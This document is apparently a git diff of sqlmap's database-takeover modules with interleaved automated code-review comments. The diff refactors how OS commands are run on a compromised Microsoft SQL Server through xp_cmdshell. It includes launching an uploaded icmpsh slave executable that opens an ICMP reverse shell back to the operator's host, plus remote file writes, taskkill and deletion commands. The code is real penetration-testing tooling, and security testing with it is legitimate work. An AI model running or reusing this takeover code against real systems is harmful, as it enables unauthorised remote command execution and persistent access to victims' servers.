diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py
index ee7b82355..d37b31885 100755
--- a/extra/icmpsh/icmpsh_m.py
+++ b/extra/icmpsh/icmpsh_m.py
@@ -93,7 +93,7 @@ def main(src, dst):
 except:
 pass
- if cmd == 'exit':
+ if cmd == 'exit\n':
 return
 # Set sequence number and identifier
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index 3dcbd7515..47ccaebcd 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -32,7 +32,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
 Web.__init__(self)
 xp_cmdshell.__init__(self)
- def execCmd(self, cmd, silent=False, forgeCmd=False):
+ def execCmd(self, cmd, silent=False):
 if self.webBackdoorUrl and not kb.stackedTest:
 self.webBackdoorRunCmd(cmd)
@@ -40,7 +40,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
 self.udfExecCmd(cmd, silent=silent)
 elif kb.dbms == "Microsoft SQL Server":
- self.xpCmdshellExecCmd(cmd, silent, forgeCmd)
+ self.xpCmdshellExecCmd(cmd, silent)
 else:
 errMsg = "Feature not yet implemented for the back-end DBMS"
@@ -79,7 +79,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
 else:
 dataToStdout("No output\n")
 else:
- self.execCmd(cmd, forgeCmd=True)
+ self.execCmd(cmd)
 def shell(self):
 if self.webBackdoorUrl and not kb.stackedTest:
diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py
index 102b961b4..4872a96d0 100644
--- a/lib/takeover/icmpsh.py
+++ b/lib/takeover/icmpsh.py
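Review bot: Comparing `cmd` against the literal `'exit\n'` ties the exit check to one exact line ending; if `cmd` comes from a readline-style read (how it is read is not visible here), a `\r\n` terminator or a final line without a newline no longer matches and the loop keeps running. Normalising before the comparison is more robust: `if cmd.rstrip('\r\n') == 'exit':`. main(src, dst) starts before this hunk, so the read that fills `cmd` and the bare `except: pass` above it are outside the change under review.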
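Review bot: Dropping the `forgeCmd` parameter from `execCmd` is an interface change that only fails at call time: any call site still passing `forgeCmd=True` raises TypeError when it runs, and the sites updated in this commit (the `@@ -79` hunk here, registry.py, misc.py) are the only ones visible. A docstring would pin the new contract, e.g. `"""Run cmd, a raw OS command line, on the back-end host; xp_cmdshell wrapping is done by xpCmdshellExecCmd, so callers must not pre-forge it."""`. The web-backdoor branch on the context line, `self.webBackdoorRunCmd(cmd)`, does not receive `silent` while the UDF and xp_cmdshell branches do; if that is intentional a one-line comment saying so would stop the next reader from "fixing" it. execCmd's body continues into the next hunk.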
@@ -7,40 +7,21 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """
-import codecs
 import os
-import re
-import stat
-import sys
 import time
-from select import select
-from subprocess import PIPE
-from subprocess import Popen as execute
-
 from extra.icmpsh.icmpsh_m import main as icmpshmaster
-from lib.core.common import dataToStdout
 from lib.core.common import getLocalIP
 from lib.core.common import getRemoteIP
-from lib.core.common import getUnicode
 from lib.core.common import normalizePath
 from lib.core.common import ntToPosixSlashes
-from lib.core.common import pollProcess
-from lib.core.common import randomRange
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
-from lib.core.exception import sqlmapDataException
-from lib.core.exception import sqlmapFilePathException
-from lib.core.subprocessng import blockingReadFromFD
-from lib.core.subprocessng import blockingWriteToFD
-from lib.core.subprocessng import setNonBlocking
-from lib.request.connect import Connect as Request
-from lib.takeover.upx import upx
 class ICMPsh:
@@ -81,22 +62,18 @@ class ICMPsh:
 infoMsg = "running icmpsh slave remotely"
 logger.info(infoMsg)
- self.__icmpshSlaveCmd = "%s -t %s -d 500 -b 30 -s 128" % (self.__icmpslaveRemote, self.lhostStr)
-
- cmd = "%s &" % self.__icmpshSlaveCmd
-
- if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct):
- cmd = self.xpCmdshellForgeCmd(cmd)
+ cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self.__icmpslaveRemote, self.lhostStr)
 self.execCmd(cmd, silent=True)
 def uploadIcmpshSlave(self, web=False):
 self.__randStr = randomStr(lowercase=True)
+ self.__icmpslaveRemoteBase = "tmpi%s.exe" % self.__randStr
 if web:
- self.__icmpslaveRemote = "%s/tmpi%s.exe" % (self.webDirectory, self.__randStr)
+ self.__icmpslaveRemote = "%s/%s" % (self.webDirectory, self.__icmpslaveRemoteBase)
 else:
- self.__icmpslaveRemote = "%s/tmpi%s.exe" % (conf.tmpPath, self.__randStr)
+ self.__icmpslaveRemote = "%s/%s" % (conf.tmpPath, self.__icmpslaveRemoteBase)
 self.__icmpslaveRemote = ntToPosixSlashes(normalizePath(self.__icmpslaveRemote))
@@ -115,4 +92,7 @@ class ICMPsh:
 debugMsg = "icmpsh master exited"
 logger.debug(debugMsg)
- self.delRemoteFile(self.__icmpslaveRemote, doubleslash=True)
+ time.sleep(1)
+ self.execCmd("taskkill /F /IM %s" % self.__icmpslaveRemoteBase, silent=True)
+ time.sleep(1)
+ self.delRemoteFile(self.__icmpslaveRemote)
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index 4ddbd48e6..b0f33ddd2 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -397,9 +397,6 @@ class Metasploit:
 cmd = "%s &" % self.exeFilePathRemote
- if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct):
- cmd = self.xpCmdshellForgeCmd(cmd)
-
 self.execCmd(cmd, silent=True)
 def __loadMetExtensions(self, proc, metSess):
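Review bot: The teardown added in the `@@ -115` hunk relies on two fixed `time.sleep(1)` waits around a `taskkill` run with `silent=True`, so if the slave process is still alive when `delRemoteFile` issues its delete, the removal fails without any signal and the uploaded file stays on the host; the same fixed-sleep-then-delete pattern is added in the metasploit.py hunk at `@@ -648`. Dropping `silent=True` from the taskkill call, or logging its result, at least makes the failure visible to the operator, and a comment stating why the sleeps exist (`# give the slave time to exit before deleting its binary`) records the assumption. `self.__icmpslaveRemoteBase` is assigned only in `uploadIcmpshSlave`, so this method raises AttributeError if it runs without a prior upload — presumably the normal flow guarantees the order, but that is not checked here. The enclosing method starts before the hunk.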
@@ -648,7 +645,8 @@ class Metasploit:
 logger.debug(debugMsg)
 if not goUdf:
- self.delRemoteFile(self.exeFilePathRemote, doubleslash=True)
+ time.sleep(1)
+ self.delRemoteFile(self.exeFilePathRemote)
 def smb(self):
 self.__initVars()
diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py
index 348c57213..11ca94953 100644
--- a/lib/takeover/registry.py
+++ b/lib/takeover/registry.py
@@ -87,7 +87,7 @@ class Registry:
 if index != -1:
 data = data[index + len(pattern):]
- self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+ self.delRemoteFile(self.__batPathRemote)
 return data
@@ -101,8 +101,8 @@ class Registry:
 debugMsg += "to registry key '%s'" % self.__regKey
 logger.debug(debugMsg)
- self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
- self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+ self.execCmd(cmd=self.__batPathRemote)
+ self.delRemoteFile(self.__batPathRemote)
 def delRegKey(self, regKey, regValue):
 self.__operation = "delete"
@@ -114,5 +114,5 @@ class Registry:
 debugMsg += "from registry key '%s'" % self.__regKey
 logger.debug(debugMsg)
- self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
- self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+ self.execCmd(cmd=self.__batPathRemote)
+ self.delRemoteFile(self.__batPathRemote)
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 0a2cc0599..390617974 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -36,7 +36,7 @@ class xp_cmdshell:
 cmd += "RECONFIGURE WITH OVERRIDE; "
 cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
 cmd += "RECONFIGURE WITH OVERRIDE; "
- self.xpCmdshellExecCmd(cmd)
+ inject.goStacked(cmd)
 self.__randStr = randomStr(lowercase=True)
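Review bot: In the xp_cmdshell.py `@@ -36` hunk the sp_configure batch is now sent through `inject.goStacked` instead of `xpCmdshellExecCmd`, which is necessary because `xpCmdshellExecCmd` (changed in the next hunk group) now always wraps its argument as an OS command, but nothing in the code records that reason and a later reader could revert it for "consistency". A one-line comment above the call would preserve the intent: `# T-SQL batch, run as-is: xpCmdshellExecCmd would wrap it in xp_cmdshell`; the same applies to the `@@ -51` and `@@ -85` hunks of this file. The configuring method starts before the hunk.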
@@ -51,7 +51,7 @@ class xp_cmdshell:
 if kb.dbmsVersion[0] in ( "2005", "2008" ):
 cmd += " RECONFIGURE WITH OVERRIDE;"
- self.xpCmdshellExecCmd(cmd)
+ inject.goStacked(cmd)
 def __xpCmdshellConfigure2005(self, mode):
 debugMsg = "configuring xp_cmdshell using sp_configure "
@@ -85,10 +85,10 @@ class xp_cmdshell:
 else:
 cmd = self.__xpCmdshellConfigure2000(mode)
- self.xpCmdshellExecCmd(cmd)
+ inject.goStacked(cmd)
 def __xpCmdshellCheck(self):
- query = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
+ query = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
 duration = timeUse(query)
 if duration >= conf.timeSec:
@@ -102,17 +102,15 @@ class xp_cmdshell:
 return forgedCmd
- def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False):
- if forgeCmd:
- cmd = self.xpCmdshellForgeCmd(cmd)
-
+ def xpCmdshellExecCmd(self, cmd, silent=False):
+ cmd = self.xpCmdshellForgeCmd(cmd)
 inject.goStacked(cmd, silent)
 def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
 self.getRemoteTempPath()
 tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
- cmd = self.xpCmdshellForgeCmd("%s > %s" % (cmd, tmpFile))
+ cmd = "%s > %s" % (cmd, tmpFile)
 self.xpCmdshellExecCmd(cmd)
diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py
index fb46cf6e1..b5aae1cc6 100644
--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
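Review bot: `xpCmdshellExecCmd` in the `@@ -102` hunk now forges `cmd` unconditionally, so a caller anywhere outside this diff that still passes an already-forged query gets it wrapped a second time; the callers corrected here are the only ones visible, so the contract should be stated on the method itself. Suggested docstring: `"""Run cmd, a raw OS command line (not T-SQL), through xp_cmdshell; the wrapping is done here, callers pass the bare command."""`. What `silent` does is decided by `inject.goStacked`, which is not shown, so describe it only as "forwarded to inject.goStacked" unless its meaning is confirmed. `xpCmdshellEvalCmd` follows the new contract correctly by handing over the bare `"%s > %s"` string; the `__xpCmdshellCheck` line above changes only in whitespace.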
@@ -146,13 +146,10 @@ class Filesystem(GenericFilesystem):
 logger.debug("moving binary file %s to %s" % (sFile, dFile))
- commands = ("cd \"%s\"" % tmpPath,
- "ren %s %s" % (chunkName, dFileName),
- "move /Y %s %s" % (dFileName, dFile))
- complComm = " & ".join(command for command in commands)
- forgedCmd = self.xpCmdshellForgeCmd(complComm)
+ commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
+ complComm = " & ".join(command for command in commands)
- self.execCmd(forgedCmd)
+ self.execCmd(complComm)
 else:
 infoMsg = "the %s file is bigger than %d " % (fileType, debugSize)
@@ -177,13 +174,10 @@ class Filesystem(GenericFilesystem):
 infoMsg += "%s\%s to %s\%s" % (tmpPath, chunkName, tmpPath, dFileName)
 logger.debug(infoMsg)
- commands = ("cd %s" % tmpPath,
- copyCmd,
- "del /F %s" % chunkName)
- complComm = " & ".join(command for command in commands)
- forgedCmd = self.xpCmdshellForgeCmd(complComm)
+ commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName)
+ complComm = " & ".join(command for command in commands)
- self.execCmd(forgedCmd)
+ self.execCmd(complComm)
 logger.info("file chunk %d written" % counter)
@@ -193,12 +187,10 @@ class Filesystem(GenericFilesystem):
 logger.debug("moving binary file %s to %s" % (sFile, dFile))
- commands = ("cd %s" % tmpPath,
- "move /Y %s %s" % (dFileName, dFile))
+ commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
 complComm = " & ".join(command for command in commands)
- forgedCmd = self.xpCmdshellForgeCmd(complComm)
- self.execCmd(forgedCmd)
+ self.execCmd(complComm)
 if confirm:
 self.askCheckWrittenFile(wFile, dFile, fileType)
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index ca0067b38..142c35f01 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
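Review bot: The rewritten command tuples quote `tmpPath` inconsistently: the `@@ -146` hunk uses `cd \"%s\"` while the `@@ -177` and `@@ -193` hunks use a bare `cd %s`, so a temporary directory whose path contains a space works in the first case and breaks the command chain in the other two. Use the quoted form in all three, e.g. `commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F %s" % chunkName)`. On style, `" & ".join(command for command in commands)` is an identity generator and reads more clearly as `" & ".join(commands)`, and collapsing each tuple onto one 100+-character line makes the command list harder to scan than the multi-line form it replaces. The enclosing method starts before the first hunk.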
@@ -205,26 +205,18 @@ class Filesystem:
 charCounter += len(forgedScrLine)
 if charCounter >= maxLen:
- forgedCmd = self.xpCmdshellForgeCmd(cmd)
- self.execCmd(forgedCmd)
+ self.execCmd(cmd)
- cmd = ""
+ cmd = ""
 charCounter = 0
 if cmd:
- forgedCmd = self.xpCmdshellForgeCmd(cmd)
- self.execCmd(forgedCmd)
-
- commands = (
- "cd %s" % tmpPath,
- "debug < %s" % randScr,
- "del /F /Q %s" % randScr
- )
+ self.execCmd(cmd)
+ commands = ( "cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr )
 complComm = " & ".join(command for command in commands)
- forgedCmd = self.xpCmdshellForgeCmd(complComm)
- self.execCmd(forgedCmd, silent=True)
+ self.execCmd(complComm, silent=True)
 return chunkName
diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py
index 619bd4835..629930b30 100644
--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@@ -75,20 +75,16 @@ class Miscellaneous:
 kb.bannerFp["dbmsVersion"] = inject.getValue(query, unpack=False)
 kb.bannerFp["dbmsVersion"] = kb.bannerFp["dbmsVersion"].replace(",", "").replace("-", "").replace(" ", "")
- def delRemoteFile(self, tempFile, doubleslash=False):
+ def delRemoteFile(self, tempFile):
 self.checkDbmsOs()
 if kb.os == "Windows":
- if doubleslash:
- tempFile = tempFile.replace("/", "\\\\")
- else:
- tempFile = posixToNtSlashes(tempFile)
-
+ tempFile = posixToNtSlashes(tempFile)
 cmd = "del /F /Q %s" % tempFile
 else:
 cmd = "rm -f %s" % tempFile
- self.execCmd(cmd, forgeCmd=True)
+ self.execCmd(cmd)
 def createSupportTbl(self, tblName, tblField, tblType):
 inject.goStacked("DROP TABLE %s" % tblName)
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
index 62b84ff93..15c78b925 100644
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
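Review bot: The `cmd = ""` line is removed and re-added with identical visible text, so the change is whitespace only — indentation or trailing spaces — and the collapsed view here cannot show which; it must remain inside the `if charCounter >= maxLen:` block, because one level shallower the accumulated buffer would be discarded on every script line while `charCounter` is reset only when the limit is hit. Please confirm the indentation against the actual file. On style, `commands = ( "cd %s" % tmpPath, ... )` carries spaces just inside the parentheses, which PEP 8 discourages, and `" & ".join(command for command in commands)` can simply be `" & ".join(commands)`. The enclosing method starts before this hunk.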
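Review bot: `delRemoteFile` interpolates `tempFile` into `del /F /Q %s` and `rm -f %s` without quoting, so a path containing a space is split into several arguments and the wrong file (or nothing) is removed; quoting the argument is a one-line fix per branch, `cmd = "del /F /Q \"%s\"" % tempFile`. The removed `doubleslash` flag implicitly documented that callers pass POSIX-slash paths; now that the conversion is always `posixToNtSlashes`, a docstring should say so: `"""Delete tempFile on the back-end host; tempFile is given with forward slashes and converted for Windows targets."""`. When `kb.os` is anything other than "Windows" (including unset) the method falls through to `rm -f`; that predates this commit but deserves a comment since the new code keeps it.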
@@ -153,6 +153,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
 errMsg += "is unlikely to receive commands send from you"
 logger.error(errMsg)
+ self.sysUdfs.pop("sys_bineval")
+
 if kb.stackedTest or conf.direct:
 web = False
@@ -207,7 +209,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
 elif tunnel == 2:
 self.uploadIcmpshSlave(web=web)
 self.icmpPwn()
-
+
 elif not kb.stackedTest and kb.dbms == "MySQL":
 web = True
@@ -244,8 +246,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
 if not web or (web and self.webBackdoorUrl is not None):
 self.pwn(goUdf)
- if not conf.cleanup:
- self.cleanup()
+ if not conf.cleanup:
+ self.cleanup()
 def osSmb(self):
 stackedTest()
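Review bot: `self.sysUdfs.pop("sys_bineval")` raises KeyError if the key is absent, for instance if this code path is reached a second time or for a back-end whose UDF table never contained it; `self.sysUdfs.pop("sys_bineval", None)` makes the removal idempotent. The line sits directly after a `logger.error` with nothing tying the two together, so a reader cannot tell whether dropping the UDF is a consequence of that error condition or an unrelated step; a comment such as `# sys_bineval is not usable in this configuration, so do not upload it` (worded to match the real reason, which is above the hunk) would make the intent explicit. The enclosing method starts before this hunk.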
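Review bot: In the `@@ -244` hunk the `if not conf.cleanup:` / `self.cleanup()` pair is removed and re-added with identical text, so only its indentation changed, and that decides whether cleanup runs inside the `if not web or (web and self.webBackdoorUrl is not None):` block or unconditionally after it; the collapsed view cannot show which level was chosen, so please confirm it is the intended one. A short comment above the condition, e.g. `# if --cleanup was not requested explicitly, remove our artifacts now`, would also record why the test is negated, which looks inverted on first reading (this assumes conf.cleanup is the explicit cleanup option; verify against option parsing).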